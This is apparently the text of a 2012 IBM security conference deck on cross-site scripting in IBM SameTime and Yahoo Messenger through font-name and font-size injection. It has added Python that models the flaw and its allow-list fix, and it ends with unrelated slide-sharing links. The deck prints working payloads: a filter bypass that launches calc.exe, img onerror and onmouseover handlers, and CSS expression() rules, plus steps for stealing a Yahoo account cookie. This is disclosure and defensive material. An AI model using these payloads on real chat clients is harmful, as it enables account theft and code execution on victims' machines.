© 2012 IBM Corporation
IBM Security Systems
Stylish XSS
via Font Name Injection
Background - Instant Messengers
<Text Style="
font-family:Segoe UI;
font-weight:bold;
font-style:italic;
color:#008000;
">Hi!</Text>
Background - Instant Messengers
Every time I’ve seen this screen, I wondered
“What if I could use some HTML here…”
Background - Windows Fonts
Windows accepts basically any character as part of the font name
Font name length limited to ~30 chars
IBM Lotus SameTime Messenger
<span style="font-size:14pt;font-family:Segoe UI;
font-weight:normal;font-style:normal;">You Do!</span>
SameTime - Exploit - CSS
Font Name: expression(alert(1));
Desired output:
<span style= ";font-family:expression(alert(1));…">
Actual output:
<span style="">
SameTime - Exploit - New Attribute
Font Name: "onclick="alert(1)"
Desired output:
<span style="font-size:9pt;font-family:"
onclick="alert(1)" ...">
Actual output:
<span style="font-size:9pt;font-family:"
onclick="">
SameTime - Exploit
~50 Fonts Later
SameTime - Exploit - Found (built up step by step on slides 11 to 16)
Message sent:
<span style="…font-family:e0"
<<style<style</style>img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:\windows\system32\calc.exe" '
</span>
Message Received:
<span style="…font-family:e0">
<img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:\windows\system32\calc.exe" '
</span>
SameTime – Remote Code Execution
<span style="font-size:14pt;font-family:e0">
<img x=';font-weight:normal;font-style:normal;">' src='x'
onerror='location="c:\windows\system32\calc.exe"'</span>
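As an added example (not code from the slides, from IBM or from the SameTime client), the following Python models the two behaviours slides 7 to 17 show: a filter that strips style elements only after the font name has already been pasted into the inline style, and the allow-list validation that would have rejected every font name the deck tried. The regex sanitizer, the REST_OF_ORIG_CSS fragment and the default font are assumptions that reproduce the outputs on the slides; the 30-character limit is the one the deck cites.

```python
import html
import re

# Constructed reproduction of the font name that survived the filter on the
# slides: a quote that closes font-family, then a mangled style element whose
# removal leaves "<img x='" behind. The message text is kept harmless here.
FONT_NAME_PAYLOAD = "e0\"\n<<style<style</style>img x='"

# The inline CSS the client appends after the font name (assumed from slide 17).
REST_OF_ORIG_CSS = ";font-weight:normal;font-style:normal;"


def naive_strip_style_elements(markup: str) -> str:
    """Assumed model of the client's filter: one non-greedy regex pass that
    removes <style>...</style>. The real filter is not available; this model
    reproduces the residue the slides show."""
    return re.sub(r"<style.*?</style>", "", markup, flags=re.S | re.I)


def naive_render_span(font_name: str, text: str) -> str:
    """Assumed model of the vulnerable rendering: the font name is pasted
    into the style attribute verbatim and the whole result is filtered
    afterwards, so stripping a tag can splice the remaining characters into
    a new element."""
    markup = (f'<span style="font-size:14pt;font-family:{font_name}'
              f'{REST_OF_ORIG_CSS}">{text}</span>')
    return naive_strip_style_elements(markup)


# Allow-list for font names: alphanumeric first character, then letters,
# digits, space, underscore or hyphen, at most 30 characters in total.
FONT_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9 _-]{0,29}")
DEFAULT_FONT = "Segoe UI"  # assumed fallback


def safe_font_family(font_name: str) -> str:
    """Validate instead of cleaning: a name that does not match the
    allow-list is replaced wholesale, so nothing is stripped and nothing is
    left over after stripping."""
    if FONT_NAME_RE.fullmatch(font_name):
        return font_name
    return DEFAULT_FONT


def safe_render_span(font_name: str, text: str) -> str:
    """Hardened rendering: validated font name, then the style value and the
    message text are escaped for their HTML contexts."""
    style = (f"font-size:14pt;font-family:{safe_font_family(font_name)}"
             f"{REST_OF_ORIG_CSS}")
    return (f'<span style="{html.escape(style, quote=True)}">'
            f'{html.escape(text, quote=True)}</span>')


def breaks_out_of_style(rendered: str) -> bool:
    """Regression check: a rendered message must contain exactly two tags,
    the opening and closing span. Any extra '<' means the font name created
    an element of its own."""
    return rendered.count("<") != 2


if __name__ == "__main__":
    print(naive_render_span(FONT_NAME_PAYLOAD, "Hi!"))
    print(safe_render_span(FONT_NAME_PAYLOAD, "Hi!"))
```

The naive path shows the failure mode on the deck: removing the style element from the middle of the font name leaves an img tag whose single-quoted attribute swallows the rest of the original CSS. The safe path never reaches that point, because the value is checked against a grammar for font names before it is placed in the attribute, and the check covers the expression() and onclick attempts from slides 7 to 9 as well.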
Yahoo Messenger
Yahoo Messenger – Message View
Lots of Colors, but that’s about it…
Yahoo Messenger - History View
Finally, Yahoo's purple alert!
Yahoo Messenger - The Payload
<img src="x"onmouseover="alert(1)">
Yahoo Messenger - Digging Deeper
Wait, what?
It's not local?!
Yahoo Messenger - Digging Deeper
Accessing this URL in Chrome yields the same result.
Yahoo Messenger - Digging Deeper
That means I can read the cookie!
And steal your account!
Yahoo Messenger - Recap
1. Send the victim a message that contains a malicious HTML snippet
2. Wait 3-4 hours for it to show up in the history
3. Convince the user to access his history or send him a direct link to it (after all, it's not local)
4. Have the victim click the Instant Message from the drop-down box
Yahoo Messenger - Introducing: Web Messenger!
Finally I can see the results of my attacks in
real time!
Yahoo Messenger - Web Messenger
During the tests, I noticed that a <Font> tag sent as part of the message text is being rendered differently in the Web Messenger.
• The message:
<font face="xxx" size="20">33333</font>
• Was rendered as:
<font style="font-size:20pt" face="xxx"
id="yui_3_2_0_20_1330267588862427">33333</font>
Yahoo Messenger - Exploiting CSS
Add a new rule with an expression() call.
Yahoo Messenger - Exploiting CSS
Started With:
<font face=ssss size="1&color:red">xxxx</font>
To my surprise, the response came back as I hoped:
<font style="font-size:1&amp;color:red" >xxxx</font>
Yahoo Messenger - Exploiting CSS
Next was the expression:
<font face=sssss size="1&color:expression(alert(1))"
>xxxx</font>
And again, it seems like nothing is filtering this...
<font style="font-size:1&amp;color:expression(alert(1))"
>xxxx</font>
Yahoo Messenger - Exploiting CSS
Time to open Internet Explorer!
Yahoo Web Messenger - IE Version
The Rules (for IE):
1. The Size attribute must be surrounded by
double-quotes (" ")
2. The size value must be followed by the "pt;"
suffix
<font size="15pt;">
Was rendered as:
<font style="font-size=15pt;">
Yahoo Web Messenger - IE Version
By tweaking the size value, a new Font-Family CSS rule could be injected.
<font size="15pt;font-family:aaaa;">
Was rendered as:
<font style="font-size=15pt;font-family: aaaa;">
Yahoo Web Messenger - IE Version
With all that in mind, and ~30 <Font> tags later, came the following payload that bypasses the CSS filtering:
<font size="15pt;font-family:expression(alert(1));">
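As an added example (not Yahoo's code and not code from the slides), the following Python models the font-size to style rewrite that slides 29 to 37 describe, beside a version that parses the value instead of copying it, and adds a check a defender can run over rendered markup for expression( calls. The rewrite function, its regexes and the allow-list for the face attribute are assumptions chosen to reproduce the outputs shown on the slides.

```python
import html
import re


def buggy_font_to_style(face: str, size: str) -> str:
    """Assumed model of the observed transformation: the size attribute is
    copied into an inline style after HTML escaping only, so ';' and any
    further CSS declarations in the value reach the browser intact."""
    style = "font-size:" + size
    return (f'<font style="{html.escape(style, quote=True)}" '
            f'face="{html.escape(face, quote=True)}">')


# Size: an integer 1-99 with an optional 'pt' suffix. Face: alphanumeric
# first character, then letters, digits, space, underscore or hyphen.
SIZE_RE = re.compile(r"([1-9][0-9]?)\s*(pt)?")
FACE_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9 _-]{0,29}")


def safe_font_to_style(face: str, size: str) -> str:
    """Hardened rewrite: parse, do not copy. The size is re-emitted from the
    parsed integer and the face must match the allow-list; values that do
    not parse are dropped, so no attacker-chosen characters are ever
    concatenated into the style value."""
    rules = []
    m = SIZE_RE.fullmatch(size.strip())
    if m:
        rules.append(f"font-size:{int(m.group(1))}pt")
    if FACE_RE.fullmatch(face):
        rules.append(f"font-family:{face}")
    style = ";".join(rules)
    return f'<font style="{html.escape(style, quote=True)}">'


CSS_EXPRESSION_RE = re.compile(r"expression\s*\(", re.I)


def has_css_expression(markup: str) -> bool:
    """Defender-side check over rendered markup: decode HTML entities first
    (the slides show '&' arriving as '&amp;'), then look for expression(."""
    return CSS_EXPRESSION_RE.search(html.unescape(markup)) is not None


if __name__ == "__main__":
    # Constructed inputs mirroring the slides' probes.
    print(buggy_font_to_style("ssss", "1&color:red"))
    print(safe_font_to_style("ssss", "1&color:red"))
    print(has_css_expression(
        buggy_font_to_style("sssss", "1&color:expression(alert(1))")))
```

The buggy path reproduces the slide's font-size:1&amp;color:red output, which the browser decodes back into two CSS declarations. The hardened path accepts 20 or 15pt and emits only what it parsed. The expression check is a detection aid rather than the fix: as the deck itself found, IE8 standards mode (forced by the X-UA-Compatible IE=8 meta tag) does not evaluate expression(), but older IE modes do, so the parsing rewrite is the control to rely on.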
Yahoo Web Messenger - IE Version
It should work correctly according to the rendered source in
IE Developer Tools
Yahoo Web Messenger - IE Version
Yet somehow, no alert
Yahoo Web Messenger - Uber Meta!
After ~5 hours of more fiddling and long lonely IM chats with myself,
I finally found out what I was afraid of.
Or in other words, the "No Expression For You" meta tag:
<meta http-equiv="X-UA-Compatible" content="IE=8"/>
Yahoo Web Messenger - Going Old School
Fired up my Windows XP VM and kicked out IE8
Yahoo Web Messenger - Finally
Yahoo Messenger - History Window
Questions?

More Related Content

What's hot

Domain Driven Design with the F# type System -- F#unctional Londoners 2014
Domain Driven Design with the F# type System -- F#unctional Londoners 2014Domain Driven Design with the F# type System -- F#unctional Londoners 2014
Domain Driven Design with the F# type System -- F#unctional Londoners 2014Scott Wlaschin
 
Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing Rishabh Upadhyay
 
Fluttercon Berlin 23 - Dart & Flutter on RISC-V
Fluttercon Berlin 23 - Dart & Flutter on RISC-VFluttercon Berlin 23 - Dart & Flutter on RISC-V
Fluttercon Berlin 23 - Dart & Flutter on RISC-VChris Swan
 
16. Java stacks and queues
16. Java stacks and queues16. Java stacks and queues
16. Java stacks and queuesIntro C# Book
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationChris Gates
 
The lazy programmer's guide to writing thousands of tests
The lazy programmer's guide to writing thousands of testsThe lazy programmer's guide to writing thousands of tests
The lazy programmer's guide to writing thousands of testsScott Wlaschin
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
Exception Handling
Exception HandlingException Handling
Exception HandlingSunil OS
 
Alphorm.com Formation CEHV9 I
Alphorm.com Formation CEHV9 IAlphorm.com Formation CEHV9 I
Alphorm.com Formation CEHV9 IAlphorm
 
DerbyCon 7 - Hacking VDI, Recon and Attack Methods
DerbyCon 7 - Hacking VDI, Recon and Attack MethodsDerbyCon 7 - Hacking VDI, Recon and Attack Methods
DerbyCon 7 - Hacking VDI, Recon and Attack MethodsPatrick Coble
 
React Native를 사용한
 초간단 커뮤니티 앱 제작
React Native를 사용한
 초간단 커뮤니티 앱 제작React Native를 사용한
 초간단 커뮤니티 앱 제작
React Native를 사용한
 초간단 커뮤니티 앱 제작Taegon Kim
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)Angel Boy
 
Hokkaido.cap#2 一般的なプロトコルのパケットを覗いてみよう
Hokkaido.cap#2 一般的なプロトコルのパケットを覗いてみようHokkaido.cap#2 一般的なプロトコルのパケットを覗いてみよう
Hokkaido.cap#2 一般的なプロトコルのパケットを覗いてみようPanda Yamaki
 
Blazing Fast, Pure Effects without Monads — LambdaConf 2018
Blazing Fast, Pure Effects without Monads — LambdaConf 2018Blazing Fast, Pure Effects without Monads — LambdaConf 2018
Blazing Fast, Pure Effects without Monads — LambdaConf 2018John De Goes
 

What's hot (20)

Domain Driven Design with the F# type System -- F#unctional Londoners 2014
Domain Driven Design with the F# type System -- F#unctional Londoners 2014Domain Driven Design with the F# type System -- F#unctional Londoners 2014
Domain Driven Design with the F# type System -- F#unctional Londoners 2014
 
Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing
 
Fluttercon Berlin 23 - Dart & Flutter on RISC-V
Fluttercon Berlin 23 - Dart & Flutter on RISC-VFluttercon Berlin 23 - Dart & Flutter on RISC-V
Fluttercon Berlin 23 - Dart & Flutter on RISC-V
 
16. Java stacks and queues
16. Java stacks and queues16. Java stacks and queues
16. Java stacks and queues
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing Presentation
 
The lazy programmer's guide to writing thousands of tests
The lazy programmer's guide to writing thousands of testsThe lazy programmer's guide to writing thousands of tests
The lazy programmer's guide to writing thousands of tests
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
 
Exception Handling
Exception HandlingException Handling
Exception Handling
 
Alphorm.com Formation CEHV9 I
Alphorm.com Formation CEHV9 IAlphorm.com Formation CEHV9 I
Alphorm.com Formation CEHV9 I
 
Dns spoofing kali linux
Dns spoofing kali linuxDns spoofing kali linux
Dns spoofing kali linux
 
DSC program.pdf
DSC program.pdfDSC program.pdf
DSC program.pdf
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
DerbyCon 7 - Hacking VDI, Recon and Attack Methods
DerbyCon 7 - Hacking VDI, Recon and Attack MethodsDerbyCon 7 - Hacking VDI, Recon and Attack Methods
DerbyCon 7 - Hacking VDI, Recon and Attack Methods
 
React Native를 사용한
 초간단 커뮤니티 앱 제작
React Native를 사용한
 초간단 커뮤니티 앱 제작React Native를 사용한
 초간단 커뮤니티 앱 제작
React Native를 사용한
 초간단 커뮤니티 앱 제작
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)
 
Hokkaido.cap#2 一般的なプロトコルのパケットを覗いてみよう
Hokkaido.cap#2 一般的なプロトコルのパケットを覗いてみようHokkaido.cap#2 一般的なプロトコルのパケットを覗いてみよう
Hokkaido.cap#2 一般的なプロトコルのパケットを覗いてみよう
 
Blazing Fast, Pure Effects without Monads — LambdaConf 2018
Blazing Fast, Pure Effects without Monads — LambdaConf 2018Blazing Fast, Pure Effects without Monads — LambdaConf 2018
Blazing Fast, Pure Effects without Monads — LambdaConf 2018
 

Viewers also liked

Viewers also liked (13)

Expedited Removal Article_NM
Expedited Removal Article_NMExpedited Removal Article_NM
Expedited Removal Article_NM
 
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayuPeluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
 
BICSI NEC ARTICLE
BICSI NEC ARTICLEBICSI NEC ARTICLE
BICSI NEC ARTICLE
 
hjm
hjmhjm
hjm
 
rbusinessreport
rbusinessreportrbusinessreport
rbusinessreport
 
SECURITY SYSTEM INTEGRATION
SECURITY SYSTEM INTEGRATIONSECURITY SYSTEM INTEGRATION
SECURITY SYSTEM INTEGRATION
 
NewMetricsforCCTV_edited
NewMetricsforCCTV_editedNewMetricsforCCTV_edited
NewMetricsforCCTV_edited
 
CIRCLES OF COVERAGE FOR TELECOM ROOMS
CIRCLES OF COVERAGE FOR TELECOM ROOMSCIRCLES OF COVERAGE FOR TELECOM ROOMS
CIRCLES OF COVERAGE FOR TELECOM ROOMS
 
Untitled Presentation
Untitled PresentationUntitled Presentation
Untitled Presentation
 
AV system and lighting controls integration
AV system and lighting controls integrationAV system and lighting controls integration
AV system and lighting controls integration
 
حب الوطن من الايمان
حب الوطن من الايمانحب الوطن من الايمان
حب الوطن من الايمان
 
Syarikat multinasional
Syarikat multinasionalSyarikat multinasional
Syarikat multinasional
 
Ensayo
Ensayo Ensayo
Ensayo
 

Similar to Stylish XSS

Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
 
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfdistortdistort
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
 
eXploitable Markup Language
eXploitable Markup LanguageeXploitable Markup Language
eXploitable Markup Languagesghctoma
 
Google chrome sandbox
Google chrome sandboxGoogle chrome sandbox
Google chrome sandboxNephi Johnson
 
Securing your web applications in CF 2016
Securing your web applications in CF 2016Securing your web applications in CF 2016
Securing your web applications in CF 2016Pavan Kumar
 
Building high performing web pages
Building high performing web pagesBuilding high performing web pages
Building high performing web pagesNilesh Bafna
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningCA API Management
 
Malware analysis
Malware analysisMalware analysis
Malware analysisDen Iir
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdfssuser01066a
 
What's new in Xamarin.Forms?
What's new in Xamarin.Forms?What's new in Xamarin.Forms?
What's new in Xamarin.Forms?James Montemagno
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientAngelo Dell'Aera
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeAman Kohli
 
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...OW2
 
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...Carl Tyler
 
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0Haytham Ghandour
 

Similar to Stylish XSS (20)

Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdf
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
Usb hack
Usb hackUsb hack
Usb hack
 
eXploitable Markup Language
eXploitable Markup LanguageeXploitable Markup Language
eXploitable Markup Language
 
Google chrome sandbox
Google chrome sandboxGoogle chrome sandbox
Google chrome sandbox
 
Securing your web applications in CF 2016
Securing your web applications in CF 2016Securing your web applications in CF 2016
Securing your web applications in CF 2016
 
Building high performing web pages
Building high performing web pagesBuilding high performing web pages
Building high performing web pages
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And Hardening
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
 
What's new in Xamarin.Forms?
What's new in Xamarin.Forms?What's new in Xamarin.Forms?
What's new in Xamarin.Forms?
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
 
Hacking_PPT
Hacking_PPT Hacking_PPT
Hacking_PPT
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on Purpose
 
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
 
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
 
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
 

Recently uploaded

Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...FIDO Alliance
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
How to Check GPS Location with a Live Tracker in Pakistan
How to Check GPS Location with a Live Tracker in PakistanHow to Check GPS Location with a Live Tracker in Pakistan
How to Check GPS Location with a Live Tracker in Pakistandanishmna97
 
Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...
Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...
Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...ScyllaDB
 
CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)Wonjun Hwang
 
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider  Progress from Awareness to Implementation.pptxTales from a Passkey Provider  Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider Progress from Awareness to Implementation.pptxFIDO Alliance
 
Event-Driven Architecture Masterclass: Challenges in Stream Processing
Event-Driven Architecture Masterclass: Challenges in Stream ProcessingEvent-Driven Architecture Masterclass: Challenges in Stream Processing
Event-Driven Architecture Masterclass: Challenges in Stream ProcessingScyllaDB
 
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)Paige Cruz
 
2024 May Patch Tuesday
2024 May Patch Tuesday2024 May Patch Tuesday
2024 May Patch TuesdayIvanti
 
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsLeah Henrickson
 
ERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctBrainSell Technologies
 
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?(Explainable) Data-Centric AI: what are you explaininhg, and to whom?
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?Paolo Missier
 
WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024Lorenzo Miniero
 
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptxCyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptxMasterG
 
Vector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptxVector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptxjbellis
 
JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuidePixlogix Infotech
 
Design and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data ScienceDesign and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data SciencePaolo Missier
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard37
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMKumar Satyam
 

Recently uploaded (20)

Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
How to Check GPS Location with a Live Tracker in Pakistan
How to Check GPS Location with a Live Tracker in PakistanHow to Check GPS Location with a Live Tracker in Pakistan
How to Check GPS Location with a Live Tracker in Pakistan
 
Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...
Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...
Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...
 
CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)
 
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider  Progress from Awareness to Implementation.pptxTales from a Passkey Provider  Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
 
Event-Driven Architecture Masterclass: Challenges in Stream Processing
Event-Driven Architecture Masterclass: Challenges in Stream ProcessingEvent-Driven Architecture Masterclass: Challenges in Stream Processing
Event-Driven Architecture Masterclass: Challenges in Stream Processing
 
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
 
2024 May Patch Tuesday
2024 May Patch Tuesday2024 May Patch Tuesday
2024 May Patch Tuesday
 
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
 
Overview of Hyperledger Foundation
Overview of Hyperledger FoundationOverview of Hyperledger Foundation
Overview of Hyperledger Foundation
 
ERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage Intacct
 
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?(Explainable) Data-Centric AI: what are you explaininhg, and to whom?
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?
 
WebRTC and SIP not just audio and video @ OpenSIPS 2024
